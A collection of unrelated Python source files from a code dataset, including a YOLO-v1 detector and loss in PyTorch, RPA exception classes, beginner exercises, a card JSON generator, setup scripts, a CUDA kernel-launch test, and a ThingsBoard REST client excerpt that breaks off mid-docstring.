outfile="NN/Saved/best/best_outputs.txt"
with open(outfile, "a+") as file:
if "best_outputs.txt" not in best_saved:
for line in first_outs[1:]:
file.write(line)
file.write("\n")
for line in outs:
file.write(line)
file.write("\n")
file.write("\n")
print("DONE")
| StarcoderdataPython |
236901 | <reponame>zoubohao/YOLO-V1-Pytorch
from abc import ABC
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import cv2
class Mish(nn.Module):
def __init__(self):
super(Mish,self).__init__()
def forward(self,x):
return x * torch.tanh(F.softplus(x))
class Conv2dDynamicSamePadding(nn.Module):
"""
The real keras/tensorflow conv2d with same padding
"""
def __init__(self, in_channels, out_channels, kernel_size, stride = 1, groups=1, bias=True):
super().__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride,
bias=bias, groups=groups)
self.stride = self.conv.stride
self.kernel_size = self.conv.kernel_size
self.dilation = self.conv.dilation
if isinstance(self.stride, int):
self.stride = [self.stride] * 2
elif len(self.stride) == 1:
self.stride = [self.stride[0]] * 2
if isinstance(self.kernel_size, int):
self.kernel_size = [self.kernel_size] * 2
elif len(self.kernel_size) == 1:
self.kernel_size = [self.kernel_size[0]] * 2
def forward(self, x):
h, w = x.shape[-2:]
h_step = math.ceil(w / self.stride[1])
v_step = math.ceil(h / self.stride[0])
h_cover_len = self.stride[1] * (h_step - 1) + 1 + (self.kernel_size[1] - 1)
v_cover_len = self.stride[0] * (v_step - 1) + 1 + (self.kernel_size[0] - 1)
extra_h = h_cover_len - w
extra_v = v_cover_len - h
left = extra_h // 2
right = extra_h - left
top = extra_v // 2
bottom = extra_v - top
x = F.pad(x, [left, right, top, bottom])
x = self.conv(x)
return x
class SeparableConvBlock(nn.Module):
def __init__(self, in_channels, out_channels=None, norm=True, activation=False):
super(SeparableConvBlock, self).__init__()
if out_channels is None:
out_channels = in_channels
# Q: whether separate conv
# share bias between depthwise_conv and pointwise_conv
# or just pointwise_conv apply bias.
# A: Confirmed, just pointwise_conv applies bias, depthwise_conv has no bias.
self.depthwise_conv = Conv2dDynamicSamePadding(in_channels, in_channels,
kernel_size=3, stride=1, groups=in_channels, bias=False)
self.pointwise_conv = Conv2dDynamicSamePadding(in_channels, out_channels, kernel_size=1, stride=1)
self.norm = norm
if self.norm:
# Warning: pytorch momentum is different from tensorflow's, momentum_pytorch = 1 - momentum_tensorflow
self.bn = nn.BatchNorm2d(out_channels)
self.activation = activation
if self.activation:
self.relu = Mish()
def forward(self, x):
x = self.depthwise_conv(x)
x = self.pointwise_conv(x)
if self.norm:
x = self.bn(x)
if self.activation:
x = self.relu(x)
return x
class Bottleneck(nn.Module):
def __init__(self, inChannels, outChannels, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inChannels, outChannels, kernel_size=1)
self.bn1 = nn.BatchNorm2d(outChannels, eps=1e-3, momentum= 1- 0.99)
self.conv2 = nn.Conv2d(outChannels, outChannels,kernel_size=3, stride = stride, groups = outChannels, padding=1)
self.bn2 = nn.BatchNorm2d(outChannels ,eps=1e-3, momentum= 1- 0.99)
self.conv3 = nn.Conv2d(outChannels, outChannels, kernel_size=1)
self.bn3 = nn.BatchNorm2d(outChannels)
self.relu = Mish()
self.downSample = nn.Sequential(nn.Conv2d(inChannels, outChannels, kernel_size=3, stride=stride, padding=1),
nn.BatchNorm2d(outChannels ,eps=1e-3, momentum= 1- 0.99),
Mish())
def forward(self, x):
identity = self.downSample(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += identity
out = self.relu(out)
return out
import math
class YoloDetection(nn.Module, ABC):
def __init__(self, backBoneOutChannels: int, backbone: nn.Module, BoundingBoxes: int,
num_classes: int, SGrid: int, imageSize : int):
"""
x, y means the center of the bounding box.
w, h means the width and height of bounding box.
x1, y1 means the left top coordinate of bounding box.
x2, y2 means the right bottom coordinate of bounding box.
(S x S): Our system divides the input image into an S × S grid. If the center of an object falls into a grid cell,
that grid cell is responsible for detecting that object.
(x,y): The (x, y) coordinates represent the center of the box relative to the bounds of the grid cell.
(w,h): The width and height are predicted relative to the whole image.
(Confidence): Finally the confidence prediction represents the IOU between the predicted box and any ground truth box.
It is zero if there is no object in this grid.
:param backBoneOutChannels: the out channels of backbone
:param backbone: At least 5 times striding 2 operation.
:param BoundingBoxes: the number of bounding boxes in one cell
:param num_classes: the number of classes which we would like to detect
:param SGrid: the number of grid which we would like to split
"""
super().__init__()
#print(imageSize // 64)
#print(SGrid)
stridesTimes = math.log2(imageSize / SGrid)
assert (stridesTimes % np.floor(stridesTimes)) == 0, "The size of image must divide by SGrid !"
assert imageSize // SGrid >= 32, "The size of image must 32 times bigger than SGrid !"
self.backbone = backbone
self.B = BoundingBoxes
self.S = SGrid
self.nc = num_classes
layers = []
stridesTimes = int(stridesTimes - 5)
if stridesTimes == 1:
layers.append(Bottleneck(backBoneOutChannels,outChannels=2048, stride=2))
else:
layers.append(Bottleneck(backBoneOutChannels,outChannels=2048, stride=2))
for _ in range(stridesTimes - 1):
layers.append(Bottleneck(2048,outChannels=2048, stride=2))
self.complete = nn.Sequential(*layers)
self.conv_2 = nn.Sequential(
SeparableConvBlock(2048, out_channels=2048, norm=True, activation=False),
Mish(),
SeparableConvBlock(2048, 2048, norm=True, activation=False),
Mish()
)
self.conv_1 = nn.Sequential(
nn.Conv2d(2048, self.B * 5 + self.nc, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(self.B * 5 + self.nc, eps=1e-3, momentum=1-0.99),
)
def forward(self, x):
"""
:param x:
:return: confidence [N, S, S, B], boxes [N, S, S, B * 4], condClasses [N, S, S, NUM_CLASSES]
"""
imgFeature = self.backbone(x)
imgFeature = self.conv_1(self.conv_2(self.complete(imgFeature)))
#print(imgFeature.shape)
finalOutput = imgFeature.permute(0,2,3,1)
### B boxes and condClass
boxesAndConfidence, condClasses = torch.split(finalOutput, [self.B * 5, self.nc], dim=-1)
boxes, confidence = torch.split(boxesAndConfidence, [self.B * 4, self.B], dim=-1)
return torch.sigmoid(confidence), torch.sigmoid(boxes), torch.sigmoid(condClasses)
def compute_iou(box1, box2):
"""Compute the intersection over union of two set of boxes, each box is [x1,y1,x2,y2].
Args:
box1: (tensor) bounding boxes, sized [N,4].
box2: (tensor) bounding boxes, sized [M,4].
Return:
(tensor) iou, sized [N,M].
"""
lt = torch.max(
box1[:, :2], # [N,2] -> [N,1,2] -> [N,M,2]
box2[:, :2], # [M,2] -> [1,M,2] -> [N,M,2]
)
rb = torch.min(
box1[:, 2:], # [N,2] -> [N,1,2] -> [N,M,2]
box2[:, 2:], # [M,2] -> [1,M,2] -> [N,M,2]
)
wh = rb - lt # [N,M,2]
wh[wh < 0] = 0 # clip at 0
inter = wh[:, 0] * wh[:, 1] # [N,M]
area1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1]) # [N,]
area2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1]) # [M,]
iou = inter / (area1 + area2 - inter + 1e-4)
return iou
class YoloLoss(nn.Module, ABC):
def __init__(self, coOrd, noObj,BoundingBoxes: int,
num_classes: int, SGrid: int, imageSize = 448, device = "cpu"):
super().__init__()
self.coOrd = coOrd
self.noObj = noObj
self.B = BoundingBoxes
self.S = SGrid
self.nc = num_classes
self.imageSize = imageSize
self.oneGridDis = imageSize // SGrid
self.leftTopPositions = np.zeros(shape=[SGrid, SGrid, 2])
for i in range(SGrid):
for j in range(SGrid):
self.leftTopPositions[i,j,:] = imageSize // SGrid * j , imageSize // SGrid * i ## x, y
self.leftTopPositions = torch.from_numpy(self.leftTopPositions).float().to(device)
self.device = device
def TransformPredictedBoxes(self, preBoxes):
"""
Transform yolo coordinate to left, top, right, bottom format.
:param preBoxes: [N, S, S, BOXES * 4], (x, y, w, h), (x, y, w, h)
:return: oriBoxes [N, S * S * Boxes, 4] (x1, y1, x2, y2)
"""
with torch.no_grad():
### [N, S, S, B, 4]
expandDim = torch.reshape(preBoxes, [-1, self.S, self.S, self.B, 4])
### [N, S, S, B, 2]
xy, wh = torch.split(expandDim, [2, 2], dim=-1)
currentLTP = torch.unsqueeze(self.leftTopPositions, dim=-2).unsqueeze(dim=0) ## [1, S, S, 1, 2]
xy = xy * self.oneGridDis
# print(xy.device)
# print(currentLTP.device)
centerXY = xy + currentLTP
### [N, S, S, B, 2]
oriWH = wh * self.imageSize
centerXY = torch.reshape(centerXY, [-1,self.S * self.S * self.B, 2])
oriWH = torch.reshape(oriWH, [-1,self.S * self.S * self.B, 2])
x = centerXY[:,:,0]
y = centerXY[:,:,1]
w = oriWH[:,:,0]
h = oriWH[:,:,1]
x1 = torch.clamp(x - w / 2.,min=0, max=self.imageSize - 1)
y1 = torch.clamp(y - h / 2.,min=0, max=self.imageSize - 1)
x2 = torch.clamp(x + w / 2.,min=0, max=self.imageSize - 1)
y2 = torch.clamp(y + h / 2.,min=0, max=self.imageSize - 1)
return torch.stack([x1, y1, x2, y2],dim=-1) #, centerXY
def TransformGroundTruth(self, gtOrdinate):
"""
Transform yolo coordinate to left, top, right, bottom format.
:param gtOrdinate: [N, S, S, 4], (x, y, w, h)
:return: oriBoxes [N, S * S, 4] (x1, y1, x2, y2)
"""
with torch.no_grad():
#print(gtOrdinate.device)
xy, wh = torch.split(gtOrdinate, [2, 2], dim=-1)
currentLTP = torch.unsqueeze(self.leftTopPositions, dim=-2).unsqueeze(dim=0) ## [1, S, S, 1, 2]
xy = torch.reshape(xy, [-1, self.S, self.S, 1, 2]) * self.oneGridDis
centerXY = xy + currentLTP
oriWH = wh * self.imageSize
centerXY = torch.reshape(centerXY, [-1,self.S * self.S, 2])
oriWH = torch.reshape(oriWH, [-1,self.S * self.S, 2])
x = centerXY[:,:,0]
y = centerXY[:,:,1]
w = oriWH[:,:,0]
h = oriWH[:,:,1]
x1 = torch.clamp(x - w / 2.,min=0, max=self.imageSize - 1)
y1 = torch.clamp(y - h / 2.,min=0, max=self.imageSize - 1)
x2 = torch.clamp(x + w / 2.,min=0, max=self.imageSize - 1)
y2 = torch.clamp(y + h / 2.,min=0, max=self.imageSize - 1)
return torch.stack([x1, y1, x2, y2],dim=-1) #, centerXY
def objMaskAndEncoder(self, groundTruth, groundLabels):
"""
In gtOrdinate, if one cell contains object, this cell will contain (x, y, w, h).
However, if there is no object in the cell, it only contains zeros (0, 0, 0, 0).
:param groundTruth: [N, GTs, 4], (x1, y1, x2, y2)
:param groundLabels: [N, GTs]
:return: objMask : [N, S, S], gtOrdinate [N, S, S, 4]; (x, y, w, h), gtLabels [N, S, S, NUM_CLASSES]
"""
with torch.no_grad():
bNum = groundTruth.shape[0]
gtsNum = groundTruth.shape[1]
x1, y1, x2, y2 = torch.split(groundTruth, [1, 1, 1, 1], dim=-1)
### center
w = x2 - x1
h = y2 - y1
### [N, GTs, 1]
x = x1 + w / 2.
y = y1 + h / 2.
### judge center in which cell
### [N, GTs ,1]
cellX = torch.floor(x / self.oneGridDis).long()
cellY = torch.floor(y / self.oneGridDis).long()
offsetX = (x - cellX * self.oneGridDis) / self.oneGridDis
offsetY = (y - cellY * self.oneGridDis) / self.oneGridDis
offsetW = torch.true_divide(w , self.imageSize)
offsetH = torch.true_divide(h, self.imageSize)
### cat [N, GTs, 4]
offset = torch.cat([offsetX, offsetY, offsetW, offsetH], dim=-1).float()
gtOrdinate = torch.zeros([bNum, self.S, self.S, 4]).float().to(self.device)
gtLabels = torch.zeros([bNum, self.S, self.S, self.nc]).to(self.device)
for i in range(bNum):
for j in range(gtsNum):
gtOrdinate[i, cellY[i, j, 0], cellX[i, j, 0], :] = offset[i, j, :]
gtLabels[i, cellY[i, j, 0], cellX[i, j, 0], groundLabels[i, j]] = 1
objMask = (gtLabels.sum(dim=-1, keepdim=False) != 0)
objMask = objMask.float()
return objMask, gtOrdinate, gtLabels
def bestIouFind(self, objMask, gtOrdinate, preBoxes):
"""
:param objMask: objMask : [N, S, S],
:param gtOrdinate: gtOrdinate [N, S, S, 4] (x, y, w, h)
:param preBoxes: [N, S, S, BOXES * 4], (x, y, w, h)
:return: boxObjMask [N, S, S, BOXES], boxIouMaxValue [N, S, S, BOXES]
"""
bNum = preBoxes.shape[0]
with torch.no_grad():
boxObjMask = torch.zeros([bNum, self.S, self.S, self.B]).float().to(self.device)
boxIouMaxValue = torch.zeros([bNum, self.S, self.S, self.B]).float().to(self.device)
## oriBoxes [N, S * S * Boxes * 4] (x1, y1, x2, y2)
originalBoxes = self.TransformPredictedBoxes(preBoxes).view([-1, self.S, self.S, self.B, 4])
## oriGts [N, S * S, 4] (x1, y1, x2, y2)
originalGts = self.TransformGroundTruth(gtOrdinate).view([-1, self.S, self.S, 4])
for b in range(bNum):
for i in range(self.S):
for j in range(self.S):
if objMask[b, i, j] != 0:
currentBoxes = originalBoxes[b, i, j, : , :]
#print("current predict boxes {}".format(currentBoxes))
currentGts = originalGts[b, i, j, :].unsqueeze(dim=0)
#print("gts {}".format(currentGts))
## [b,4] , [1,4] --> [b,1]
iouCom = compute_iou(currentBoxes, currentGts).squeeze()
#print(iouCom)
iouMaxValue, iouMaxIndex = torch.max(iouCom,dim=0)
#print("IOU max value {}".format(iouMaxValue))
iouMaxIndex = iouMaxIndex.long()
boxObjMask[b, i, j, iouMaxIndex] = 1
boxIouMaxValue[b, i, j, iouMaxIndex] = iouMaxValue
return boxObjMask, boxIouMaxValue
def forward(self,preConfidence, preBoxes, preCondClasses,
groundTruth, groundLabels):
"""
:param preConfidence: [N, S, S, BOXES]
:param preBoxes: [N, S, S, BOXES * 4], (x, y, w, h)
:param preCondClasses: [N, S, S, NUM_CLASSES]
:param groundTruth: [N, GTs, 4], (x1, y1, x2, y2)
:param groundLabels: [N, GTs]
:return LOSS
"""
with torch.no_grad():
### objMask : [N, S, S], gtOrdinate [N, S, S, 4] (x, y, w, h), gtLabels [N, S, S, NUM_CLASSES]
objectMask, gtOrdinate, gtLabels = self.objMaskAndEncoder(groundTruth, groundLabels)
#print(objectMask)
#print(groundLabels.shape)
### boxObjMask [N, S, S, BOXES], boxIouMaxValue [N, S, S, BOXES]
boxObjMask, boxIouMaxValue = self.bestIouFind(objectMask, gtOrdinate, preBoxes)
#print(boxObjMask)
#######################
### coordinate loss ###
#######################
### [N, S, S, B, 4]
expandPreBoxes = torch.reshape(preBoxes, [-1, self.S, self.S, self.B, 4])
### [N, S, S, B, 1]
boxObjMaskExpand = torch.unsqueeze(boxObjMask,dim=-1)
### [N, S, S, B, 2]
xy, wh = torch.split(expandPreBoxes, [2,2], dim=-1)
wh = torch.sqrt(wh)
### [N, S, S, 2] --> [N, S, S, 1, 2]
xyGt, whGt = torch.split(gtOrdinate, [2,2], dim=-1)
whGt = torch.sqrt(whGt)
xyGt = torch.unsqueeze(xyGt, dim=-2)
whGt = torch.unsqueeze(whGt, dim=-2)
### [N, S, S, B, 2]
# print("predict xy {}".format(xy * boxObjMaskExpand))
# print("GT xy {}".format(xyGt))
xyLoss = (torch.square(xy - xyGt) * boxObjMaskExpand).sum()
whLoss = (torch.square(wh - whGt) * boxObjMaskExpand).sum()
coordinateLoss = (xyLoss + whLoss) * self.coOrd
#print("coordinate loss {}".format(coordinateLoss))
#######################
### confidence loss ###
#######################
noBoxObjMask = 1. - boxObjMask
# print("Box obj mask {}".format(boxObjMask))
# print("Non box obj mask {}".format(noBoxObjMask))
objLoss = (torch.square(preConfidence - boxObjMask) * boxObjMask).sum()
noObjLoss = self.noObj * (torch.square(preConfidence - boxObjMask) * noBoxObjMask).sum()
#print("confidence loss {}".format(confidenceLoss))
##############################
### condition classes loss ###
##############################
classesLoss = (torch.square(preCondClasses - gtLabels).sum(dim=-1, keepdim=False) * objectMask).sum()
#print("classes loss {}".format(classesLoss))
return coordinateLoss , objLoss, noObjLoss , classesLoss
# drawBox([[x, y, xmax, ymax]], img)
def drawBox(boxes, image):
"""
:param boxes: np array, [N,4], (x1, y1, x2, y2)
:param image: np array
:return:
"""
numBox = boxes.shape[0]
for i in range(0, numBox):
# changed color and width to make it visible
cv2.rectangle(image, (boxes[i,0], boxes[i,1]), (boxes[i,2], boxes[i,3]), (255, 0, 0), 1)
cv2.imshow("img", image)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
testLoss = YoloLoss(1,1, BoundingBoxes=3, num_classes=1, SGrid= 7, imageSize=448)
testWhiteImg = np.ones([448,448,3]) * 255
testGts = torch.from_numpy(np.array([[[0, 0, 50, 122], [50, 122, 100, 278], [100, 278, 200, 445]]]))
testGtLabels = torch.from_numpy(np.array([[0,0,0]]))
testObjMask, testGtOri, testGtLabels = testLoss.objMaskAndEncoder(testGts,testGtLabels)
print(testObjMask.shape)
print(testObjMask)
print(testGtOri.shape)
print(testGtOri)
print(testGtLabels.shape)
print(testGtLabels)
drawBoxes = testLoss.TransformGroundTruth(testGtOri).view([7 * 7, 4]).numpy()
print(drawBoxes.shape)
drawBox(drawBoxes,testWhiteImg)
### test predict
testInput = torch.rand([1, 7, 7, 3 * 4])
### test best iou function
testObjBoxesMask, testObjIou = testLoss.bestIouFind(testObjMask, testGtOri, testInput)
print(testObjBoxesMask)
print(testObjIou)
### test mse loss
mesTestInput = torch.rand([5,5,1])
mestTestTarget = torch.rand([5,5,5])
print(F.mse_loss(mesTestInput, mestTestTarget))
########
testInputImage = torch.rand([1, 3, 14, 14]).float()
testGts = torch.from_numpy(np.array([[[0, 0, 50, 122], [50, 122, 100, 278], [100, 278, 200, 445]]]))
testGtLabels = torch.from_numpy(np.array([[0,0,0]]))
testBackBone = nn.Conv2d(3, 1024, 3, 1, 1)
testYoloDet = YoloDetection(backbone=testBackBone, backBoneOutChannels=1024, BoundingBoxes=3, num_classes=1, SGrid=7, imageSize=448)
testYoloLoss = YoloLoss(coOrd=5, noObj=0.2, BoundingBoxes=3, num_classes=1, SGrid=7, imageSize=448)
testConfi, testBoxes, testCondi = testYoloDet(testInputImage)
print(testConfi.shape)
print(testBoxes.shape)
print(testCondi.shape)
## preConfidence, preBoxes, preCondClasses, groundTruth, groundLabels
loss = testYoloLoss(preConfidence = testConfi, preBoxes = testBoxes, preCondClasses = testCondi,
groundTruth = testGts, groundLabels = testGtLabels)
print(loss)
| StarcoderdataPython |
9710687 | from iBott.robot_activities import RobotException, get_instances
import iRobot.robot as robot
import iRobot.settings as settings
class BusinessException(RobotException):
"""Manage Exceptions Caused by business errors"""
def __init__(self, message=None, action=None, element=None):
self.robotClass = get_instances(robot.Main)
super().__init__(self.robotClass, action)
self.action = action
self.element = element
self.message = message
self.processException()
def processException(self):
"""Write action when a Business exception occurs"""
if self.action is "next":
self.element.setItemAsFail()
class SystemException(RobotException):
"""Manage Exceptions Caused by system errors"""
def __init__(self, message, action):
super().__init__(get_instances(robot.Main), action)
self.retry_times = settings.RETRY_TIMES
self.action = action
self.message = message
self.processException()
def processException(self):
"""Write action when a system exception occurs"""
self.Log.systemException(self.message)
| StarcoderdataPython |
6676447 | <reponame>deredsonjr/testerepository
#-----------------------------------------------
#Introdução a Programação dos Computadores - IPC
#Universidade do Estado do Amazonas - UEA
#Prof. Jucimar Jr.
#<NAME> -|- 1715310011
#<NAME> -|- 1715310026
#<NAME> do nascimento -|- 1515200550
#<NAME> -|- 1715310063
#<NAME> -|- 1515070169
#Faça um Programa que peça 2 números inteiros e um número real. Calcule e mostre:
#a) o produto do dobro do primeiro com metade do segundo .
#b) a soma do triplo do primeiro com o terceiro.
#c) o terceiro elevado ao cubo.
#-----------------------------------------------
a = int(input("Digite um número inteiro: ")) #primeiro número é imputado
b = int(input("Digite um número inteiro: ")) #segundo número é imputado
c = float(input("Digite um número real: ")) #terceiro número é imputado
print("o produto do dobro do primeiro com metade do segundo: ", (a*2)*(b/2)) #a primeira operação é feita e mostrada na tela
print("a soma do triplo do primeiro com o terceiro: ", a*3+c) #a segunda operação é feita e mostrada na tela
print("o terceiro elevado ao cubo: ", c**3) #a terceira operação é feita e mostrada na tela
| StarcoderdataPython |
3200913 | # Desqafio104 o programa possui uma função que verifica se o input é um numero int
def leiaInt (num):
while True:
if num.isnumeric():
return num
#print(f'Você digitou {num}')
#break
else:
print(f' {num} Não é um numero, digite um numero')
print()
num = input('Digite um numero')
novo_numero = leiaInt('k')
print(novo_numero) | StarcoderdataPython |
293622 | from .. import pytib
| StarcoderdataPython |
3297295 | """
Generate cards JSON from APK CSV source.
"""
import csv
import logging
import os
import re
from .base import BaseGen
from .util import camelcase_split
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class Cards(BaseGen):
def __init__(self, config):
super().__init__(config)
def arena_id(self, key):
"""Return arena integer id by arena key."""
csv_path = os.path.join(self.config.csv.base, self.config.csv.path.arenas)
with open(csv_path) as f:
texts_reader = csv.DictReader(f)
for row in texts_reader:
if row['Name'] == key:
return int(row['Arena'])
return None
def run(self):
"""Generate all jsons"""
self.make_cards()
def make_cards(self):
"""Generate cards.json"""
cards = []
card_num = 0
card_keys = []
def card_type(card_config, card_num):
"""make card dicts by type."""
csv_path = os.path.join(self.config.csv.base, card_config.csv)
with open(csv_path, encoding="utf8") as f:
reader = csv.DictReader(f)
for i, row in enumerate(reader):
if i > 0:
card_num += 1
process = True
if row['NotInUse']:
process = False
elif row['Name'].lower().startswith('notinuse'):
process = False
if process:
name_en = self.text(row['TID'], 'EN')
if name_en == '':
name_en = row['Name']
if name_en is not None:
name_strip = re.sub('[.\-]', '', name_en)
ccs = camelcase_split(name_strip)
key = '-'.join(s.lower() for s in ccs)
# card_key = '_'.join(s.lower() for s in ccs)
decklink = card_config.sckey.format(i - 1)
elixir = row.get('ManaCost')
if elixir is not None:
elixir = int(elixir)
card = {
'key': key,
'name': name_en,
'elixir': elixir,
'type': card_config.type,
'rarity': row['Rarity'],
'arena': self.arena_id(row['UnlockArena']),
'description': self.text(row['TID_INFO'], 'EN'),
'id': int(decklink)
}
# skip unreleased cards
if key in ['wolf-rider', 'prison-goblin']:
continue
# ensure unique keys — dev builds have non unique keys
if key not in card_keys:
card_keys.append(key)
cards.append(card)
logger.info(card)
else:
logger.warning( 'Duplicate card key: %s, skipping...', key )
return card_num
for card_config in self.config.cards:
card_num = card_type(card_config, card_num)
json_path = os.path.join(self.config.json.base, self.config.json.cards)
self.save_json(cards, json_path)
| StarcoderdataPython |
1661126 | <reponame>Morabaraba/calculate
from distutils.core import setup
setup(
name='calculate',
version='0.1',
packages=['calculate',],
license='beerware',
long_description=open('README.md').read(),
) | StarcoderdataPython |
6409474 | """Define all exceptions that occur in pysg.
"""
class Error(Exception):
"""Base class for exceptions."""
pass
class ParameterError(Error):
"""Exception raised for invalid camera parameter."""
def __init__(self, expr, msg):
self.expr = expr
self.msg = msg
class PyrrTypeError(Error):
"""Exception raised for invalid pysg type."""
def __init__(self, expr, msg):
self.expr = expr
self.msg = msg | StarcoderdataPython |
11223085 | <gh_stars>1-10
from distutils.core import setup
setup(
name = "hookah",
version="0.0.9",
description="The webhook event broker",
author="<NAME>",
author_email="<EMAIL>",
url="http://github.com/progrium/hookah/tree/master",
download_url="http://github.com/progrium/hookah/tarball/master",
classifiers=[
],
packages=['hookah'],
data_files=[('twisted/plugins', ['twisted/plugins/hookah_plugin.py'])],
scripts=['bin/hookah'],
)
| StarcoderdataPython |
3325917 | <filename>test/test_user.py
import pytest
import mock
import builtins
import user
# ToDo
def test_get_number_of_players():
expected_result = 2
with mock.patch.object(builtins, "input", lambda input_str: str(expected_result)):
assert user.get_number_of_players() == expected_result
| StarcoderdataPython |
342612 | <reponame>lqez/pynpk
from __future__ import with_statement
import os.path
import re
from setuptools import find_packages, setup
from setuptools.command.test import test
import sys
try:
with open(os.path.join(os.path.dirname(__file__), 'requirements.txt')) as f:
requirements = [i for i in f if not i.startswith('#')]
except IOError:
requirements = []
# use pytest instead
def run_tests(self):
pyc = re.compile(r'\.pyc|\$py\.class')
test_file = pyc.sub('.py', __import__(self.test_suite).__file__)
raise SystemExit(__import__('pytest').main([test_file]))
test.run_tests = run_tests
tests_require = ['pytest']
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: MIT License',
]
setup(
name='pynpk',
version='0.1.1',
packages=['npk'],
author='<NAME>',
author_email='<EMAIL>' '@' 'gmail.com',
maintainer='<NAME>',
maintainer_email='<EMAIL>' '@' 'gmail.com',
url='http://github.com/lqez/pynpk',
description='pynpk',
install_requires=requirements,
classifiers=classifiers,
test_suite='npktest',
tests_require=tests_require,
)
| StarcoderdataPython |
4800807 | def iloczyn_ciagu(* ciag):
if len(ciag) == 0:
return 0.0
else:
iloczyn=1.0
for elem in ciag:
#iloczyn = iloczyn*elem
iloczyn*=elem
return iloczyn
print(iloczyn_ciagu())
print(iloczyn_ciagu(1, 2, 3, 4))
print(iloczyn_ciagu(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))
| StarcoderdataPython |
1768532 | gent_centre_31370 = geopandas.GeoSeries([gent_centre], crs="EPSG:4326").to_crs("EPSG:31370") | StarcoderdataPython |
4917382 | from torch.testing._internal.common_utils import TestCase, run_tests
from torch.testing import check_cuda_kernel_launches, check_code_for_cuda_kernel_launches
class AlwaysCheckCudaLaunchTest(TestCase):
def test_check_code(self):
"""Verifies that the regex works for a few different situations"""
# Try some different spacings
self.assertEqual(2, check_code_for_cuda_kernel_launches("""
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
some_other_stuff;
some_function_call<TemplateArg><<<1,2,0,stream>>>(arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>> (arg1,arg2,arg3);
C10_CUDA_KERNEL_LAUNCH_CHECK();
some_function_call<TemplateArg><<<1,2,0,stream>>> ( arg1 , arg2 , arg3 ) ;
C10_CUDA_KERNEL_LAUNCH_CHECK();
"""))
# Does it work for macros?
self.assertEqual(0, check_code_for_cuda_kernel_launches(r"""
#define SOME_MACRO(x) some_function_call<<<1,2>>> ( x ) ; \
C10_CUDA_KERNEL_LAUNCH_CHECK();
#define SMALL_INDEX(TENSOR_TYPE, INDICES_TYPE, TYPE, SELF_DIM, SOURCE_DIM, IDX_DIM) \
indexAddSmallIndex<TENSOR_TYPE, INDICES_TYPE, TYPE, SELF_DIM, SOURCE_DIM, IDX_DIM> \
<<<smallIndexGrid, smallIndexBlock, 0, stream>>>( \
selfInfo, sourceInfo, indexInfo, \
selfAddDim, sourceAddDim, sliceSize, selfAddDimSize); \
C10_CUDA_KERNEL_LAUNCH_CHECK();
"""))
def test_check_cuda_launches(self):
check_cuda_kernel_launches()
# TODO: Enable this after warning messages have been dealt with.
self.assertTrue(True)
# self.assertTrue(check_cuda_kernel_launches() == 0)
if __name__ == '__main__':
run_tests()
| StarcoderdataPython |
6619747 | # coding: utf-8
"""
ThingsBoard REST API
ThingsBoard open-source IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3-SNAPSHOT
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class EntityViewControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def assign_entity_view_to_customer_using_post(self, customer_id, entity_view_id, **kwargs): # noqa: E501
"""Assign Entity View to customer (assignEntityViewToCustomer) # noqa: E501
Creates assignment of the Entity View to customer. Customer will be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_customer_using_post(customer_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.assign_entity_view_to_customer_using_post_with_http_info(customer_id, entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.assign_entity_view_to_customer_using_post_with_http_info(customer_id, entity_view_id, **kwargs) # noqa: E501
return data
def assign_entity_view_to_customer_using_post_with_http_info(self, customer_id, entity_view_id, **kwargs): # noqa: E501
"""Assign Entity View to customer (assignEntityViewToCustomer) # noqa: E501
Creates assignment of the Entity View to customer. Customer will be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.assign_entity_view_to_customer_using_post_with_http_info(customer_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: A string value representing the customer id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
